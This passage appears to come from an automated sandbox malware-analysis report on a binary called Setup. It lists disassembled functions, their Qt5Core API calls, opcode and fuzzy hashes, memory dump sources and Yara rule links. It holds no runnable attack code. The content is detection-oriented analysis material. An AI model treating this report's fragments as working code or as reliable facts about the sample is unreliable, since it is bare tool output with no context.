                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?end@$?begin@?compare@Array@@ByteCaseQt@@@Sensitivity@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 85410061-0
                                                                                                                                                              • Opcode ID: 82840bd4ae6b17c0be70eb2b60356efa45b29b40af50d9216e73547e2c733f8e
                                                                                                                                                              • Instruction ID: 4e5bb7c90f4e56e5bf3523643a38e0772d429cf5b4d76935b40928ca8d6aa8e1
                                                                                                                                                              • Opcode Fuzzy Hash: 82840bd4ae6b17c0be70eb2b60356efa45b29b40af50d9216e73547e2c733f8e
                                                                                                                                                              • Instruction Fuzzy Hash: 34018462B1AA4182EF91CF22E904169B365FF89FC0B489032DE5E47B54DF3CD455CB00
                                                                                                                                                              Function 00007FFBA19F8280 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Url@@$Mutex@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 858016824-0
                                                                                                                                                              • Opcode ID: bd4148bd21f3232f856377028b4a1fa021a45a03e059cb336828da6b1590c17d
                                                                                                                                                              • Instruction ID: 2cd66b7e0abdabbe63321f5d968104ba4fdc83dc1d8cab72b639a27815a0900f
                                                                                                                                                              • Opcode Fuzzy Hash: bd4148bd21f3232f856377028b4a1fa021a45a03e059cb336828da6b1590c17d
                                                                                                                                                              • Instruction Fuzzy Hash: 400144B6A19D0195EB85CF29E8403B963B2FFD8B94F548031DE5E46658EF3CE445CB00
                                                                                                                                                              Function 00007FFBA1994440 Relevance: 6.0, APIs: 4, Instructions: 33timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isValid@QDateTime@@QEBA_NXZ.QT5CORE(?,?,00000000,00007FFBA19A1740), ref: 00007FFBA199445A
                                                                                                                                                              • ?currentDateTimeUtc@QDateTime@@SA?AV1@XZ.QT5CORE(?,?,00000000,00007FFBA19A1740), ref: 00007FFBA1994470
                                                                                                                                                              • ??MQDateTime@@QEBA_NAEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA19A1740), ref: 00007FFBA1994481
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA19A1740), ref: 00007FFBA199449C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Date$Time@@$?currentTimeUtc@V0@@Valid@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2771487965-0
                                                                                                                                                              • Opcode ID: cb7bc13e3fc7d25824b6fadc28b136a56942d950f70fc1b3679f36ce193a21b2
                                                                                                                                                              • Instruction ID: a0d37fd818a58f66dbbfcdfbdd0bcb084a1026436d2dec83717a739c89554646
                                                                                                                                                              • Opcode Fuzzy Hash: cb7bc13e3fc7d25824b6fadc28b136a56942d950f70fc1b3679f36ce193a21b2
                                                                                                                                                              • Instruction Fuzzy Hash: 0CF08C62A1E50286EF828F26E5502BD63A1FF94F88F484432DE5E07265DF2DD485DE00
                                                                                                                                                              Function 00007FFBA1977420 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QThread@@QEAA@PEAVQObject@@@Z.QT5CORE(?,?,00000000,00007FFBA19D4F4C), ref: 00007FFBA1977447
                                                                                                                                                                • Part of subcall function 00007FFBA1973DD0: ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE ref: 00007FFBA1973E06
                                                                                                                                                              • ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFBA1977475
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1977480
                                                                                                                                                              • ?start@QThread@@QEAAXW4Priority@1@@Z.QT5CORE ref: 00007FFBA197748F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteThread@@$?set?start@ArrayArray@@DataName@ObjectObject@@Object@@@Priority@1@@Ptr@@@String@@String@@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3444596378-0
                                                                                                                                                              • Opcode ID: d627dec07079048f0b03d8363c71bd04fabfb89bafbfc38f625d23bc7f1dc1cf
                                                                                                                                                              • Instruction ID: 72b1a508166060b0c5bd576d356cc71f45844405c599d99fc977af61c521c792
                                                                                                                                                              • Opcode Fuzzy Hash: d627dec07079048f0b03d8363c71bd04fabfb89bafbfc38f625d23bc7f1dc1cf
                                                                                                                                                              • Instruction Fuzzy Hash: B6015A62B1AB4292DB86CB36E85426963A0FB88B94F445136DE5E07725EF3CE056CB00
                                                                                                                                                              Function 00007FFBA19E0CE0 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?lock@Array@@ByteLocker@@MutexMutex@@String@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1807476591-0
                                                                                                                                                              • Opcode ID: 3ada8d47f969b9265ee9abe8f87738b19a4566d122af7ea3717c8dbfbab63b10
                                                                                                                                                              • Instruction ID: 1a9811c795b8f9cc55387409ac984671d153319e1fb554cf56787558000fa888
                                                                                                                                                              • Opcode Fuzzy Hash: 3ada8d47f969b9265ee9abe8f87738b19a4566d122af7ea3717c8dbfbab63b10
                                                                                                                                                              • Instruction Fuzzy Hash: 68F04965B19B4181EF85CB15F4940696361FF48FD4B489131DE5F47654EF3CD494CB00
                                                                                                                                                              Function 00007FFBA1A1F550 Relevance: 6.0, APIs: 4, Instructions: 31timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,FFFFFFFF,00007FFBA1A22202,?,?,000000E8,00007FFBA198468C,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1A1F571
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,FFFFFFFF,00007FFBA1A22202,?,?,000000E8,00007FFBA198468C,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1A1F57B
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,FFFFFFFF,00007FFBA1A22202,?,?,000000E8,00007FFBA198468C,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1A1F597
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,FFFFFFFF,00007FFBA1A22202,?,?,000000E8,00007FFBA198468C,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1A1F5A1
                                                                                                                                                                • Part of subcall function 00007FFBA1A364D0: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A364E8
                                                                                                                                                                • Part of subcall function 00007FFBA1A364D0: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A3650D
                                                                                                                                                                • Part of subcall function 00007FFBA1A364D0: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A36524
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteDateLogger@@MessageTime@@$?warning@Category@@Enabled@H00@LoggingWarning
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1974625209-0
                                                                                                                                                              • Opcode ID: f21fb71ee1115d82c95222deb55485354d978ddabe57de05b90c92d0b619d4ef
                                                                                                                                                              • Instruction ID: 874fe1056b395beeab5875101990136e45553764570415d19a8ee246af1063b0
                                                                                                                                                              • Opcode Fuzzy Hash: f21fb71ee1115d82c95222deb55485354d978ddabe57de05b90c92d0b619d4ef
                                                                                                                                                              • Instruction Fuzzy Hash: 510162A2A1994681EB86DF30E8511BC1321FF84B54F844033DD2E461A9EF2CDD89CB40
                                                                                                                                                              Function 00007FFBA1990A50 Relevance: 6.0, APIs: 4, Instructions: 28timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateTime@@$BasicMutex@@Timer@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1432639436-0
                                                                                                                                                              • Opcode ID: cd70da8a9624096a3f658cbeea4880ebef305c2098402aa6ee0a2876a65c14c1
                                                                                                                                                              • Instruction ID: 835ac21bfbb950934e1ba7e03f686a0c59808e951103b0c29cea46870898440d
                                                                                                                                                              • Opcode Fuzzy Hash: cd70da8a9624096a3f658cbeea4880ebef305c2098402aa6ee0a2876a65c14c1
                                                                                                                                                              • Instruction Fuzzy Hash: 85F0E17161AA4682EB859F76F84416833A0FB58BA8F044035DE6E87359EF3CD495CF40
                                                                                                                                                              Function 00007FFBA1974400 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteString@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2517040404-0
                                                                                                                                                              • Opcode ID: 5dbcab38921161d596302fea7d6e54226bf510de62c27cf7a1e9f8da003494d8
                                                                                                                                                              • Instruction ID: 368e94f69479e40a6fc591d143fb323c6ce05ce0713b8538b66e39ea7b2402b6
                                                                                                                                                              • Opcode Fuzzy Hash: 5dbcab38921161d596302fea7d6e54226bf510de62c27cf7a1e9f8da003494d8
                                                                                                                                                              • Instruction Fuzzy Hash: E2F090A6A1EA8281EF82CB61F8440799321FF99BE0F445031EE1E07799EF2CD049CF00
                                                                                                                                                              Function 00007FFBA1974120 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteString@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1086182875-0
                                                                                                                                                              • Opcode ID: 7612cfab4a2ff817ac6dc6ffce9a5f424e9ed2e4dab09773816ace5f6eb7f04f
                                                                                                                                                              • Instruction ID: e367034fe553ec7f2fc19c1dc6427f2bd7abf2081504ea823e75542fbc5322d7
                                                                                                                                                              • Opcode Fuzzy Hash: 7612cfab4a2ff817ac6dc6ffce9a5f424e9ed2e4dab09773816ace5f6eb7f04f
                                                                                                                                                              • Instruction Fuzzy Hash: 6EF03662B19A82D1EF458F26F8440596331FB48BD4B889031DE5D0B759EF3CD495CF00
                                                                                                                                                              Function 00007FFBA1A410A0 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A281A0: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A28223
                                                                                                                                                                • Part of subcall function 00007FFBA1A281A0: ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE ref: 00007FFBA1A28245
                                                                                                                                                              • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE(?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A410E4
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A410FF
                                                                                                                                                              • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE ref: 00007FFBA1A41105
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A41119
                                                                                                                                                                • Part of subcall function 00007FFBA1A43750: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1A43864
                                                                                                                                                                • Part of subcall function 00007FFBA1A43750: ??1QMutexLocker@@QEAA@XZ.QT5CORE ref: 00007FFBA1A43880
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@$?sharedArrayNull@String@@$?dispose@Data@1@@ListLocker@@Mutex
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1678669062-0
                                                                                                                                                              • Opcode ID: 6576ddf764f9e1efce76af8b7ac6402b0443fb2cf65b66b0b798d262ce4da8d0
                                                                                                                                                              • Instruction ID: fd3fd18a111cb8f7c8daad8c25ee3c7ec12d53cd740f6d93807622d870f5f607
                                                                                                                                                              • Opcode Fuzzy Hash: 6576ddf764f9e1efce76af8b7ac6402b0443fb2cf65b66b0b798d262ce4da8d0
                                                                                                                                                              • Instruction Fuzzy Hash: 4D01BB7651AF81C5E7829F70E88929933E9FB09B14F484136CE9C4A365FF389198CB20
                                                                                                                                                              Function 00007FFBA1A1EBB0 Relevance: 6.0, APIs: 4, Instructions: 24timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A1EACA,?,?,?,00007FFBA1971752), ref: 00007FFBA1A1EBC0
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A1EACA,?,?,?,00007FFBA1971752), ref: 00007FFBA1A1EBCA
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A1EACA,?,?,?,00007FFBA1971752), ref: 00007FFBA1A1EBEA
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A1EACA,?,?,?,00007FFBA1971752), ref: 00007FFBA1A1EBF4
                                                                                                                                                                • Part of subcall function 00007FFBA1A43750: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1A43864
                                                                                                                                                                • Part of subcall function 00007FFBA1A43750: ??1QMutexLocker@@QEAA@XZ.QT5CORE ref: 00007FFBA1A43880
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateString@@Time@@$?dispose@Data@1@@Data@@ListLocker@@Mutex
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 246617890-0
                                                                                                                                                              • Opcode ID: e1a191e1ef151e274a364ba269680d3b45dd0aa96f46ded9e84b1903d4e66a4f
                                                                                                                                                              • Instruction ID: d8e205ea135339c158ba87f0276c77969d2017dad0eff98936c52b8a6fccad47
                                                                                                                                                              • Opcode Fuzzy Hash: e1a191e1ef151e274a364ba269680d3b45dd0aa96f46ded9e84b1903d4e66a4f
                                                                                                                                                              • Instruction Fuzzy Hash: 5AF017B2A1AA0682DF829F35E84412823B4FB18B29F000432CE6D87355FF3CD195CF40
                                                                                                                                                              Function 00007FFBA1973FA0 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1973FB2
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1973FC0
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA19802FE
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??0QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA1980308
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA1980312
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA198031C
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA1980326
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA1980330
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA198033A
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA198036B
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1980380
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1973FD9
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1973FE4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@Byte$V0@@$BasicDateTime@@Timer@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 694399551-0
                                                                                                                                                              • Opcode ID: 941100d240ab8269530cd3a65c89a8cf04c11404fb4b25277bdecac0c7cfd39c
                                                                                                                                                              • Instruction ID: ea9ceff16863d3b5aa739c137a307a19846bbaf407c0dc9163794cc1b6da994b
                                                                                                                                                              • Opcode Fuzzy Hash: 941100d240ab8269530cd3a65c89a8cf04c11404fb4b25277bdecac0c7cfd39c
                                                                                                                                                              • Instruction Fuzzy Hash: 45E03062A1D98291DF419B61F8440A9A331FF94BD0F444032EE5E47669EF2CC549CF00
                                                                                                                                                              Function 00007FFBA1A24E10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
